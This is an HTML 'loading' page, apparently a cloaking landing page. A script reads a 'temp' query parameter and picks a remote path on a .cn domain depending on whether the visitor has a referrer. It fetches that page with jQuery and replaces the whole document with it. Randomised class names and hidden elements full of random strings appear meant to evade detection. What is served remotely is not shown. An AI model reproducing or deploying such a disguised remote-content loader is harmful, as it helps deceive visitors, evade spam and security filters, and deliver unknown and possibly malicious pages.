<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .DarHHQFog {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .DarHHQFog .vDUvGhfU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .DarHHQFog .content {
            line-height: 50px;
            text-align: center
        }

        .DarHHQFog .img {
            width: 100%
        }

        .DarHHQFog .i414FF {
            text-align: center
        }

        .DarHHQFog .i414FF span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .DarHHQFog .i414FF span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .DarHHQFog .i414FF span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .DarHHQFog .i414FF span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .DarHHQFog .i414FF span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .DarHHQFog .i414FF span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .DarHHQFog .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rISWFKT6N(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Nvf4zO = rISWFKT6N('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Nvf4zO +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Nvf4zO +".html?a=share";
		}
		
        StMQkcLuMV=url+"#"+new Date().getTime();
        StMQkcLuMV && function() {
            $.get(StMQkcLuMV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>mtuaYQFL2m9N</a>
<ul style='display:none' >kTZ1hY02MV3Iwz1dJdWeNQT3C9xEsRPVgvuOoYyswDiJe3X87NUN8OA9Buh7CmQpUP2QhTtpifP0xh4y</ul>
<img  src='' style='display:none'><div class="DarHHQFog">
    <div class="vDUvGhfU">
        <div class="i414FF">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<b style='display:none' >KXlTW3aEcTRbuVbdW2jFVtlMFC4RSzrVCH4CMThLjdZg8KghiFBw6p6ISVA97wP</b>
<li style='display:none' >YMQbyQXkJg0k4kPytkMECWaxgpETS8ANOKl8kHVsGqkfaf89OVgAEGI</li>
<li style='display:none' >YMQbyQXkJg0k4kPytkMECWaxgpETS8ANOKl8kHVsGqkfaf89OVgAEGI</li></body>
</html>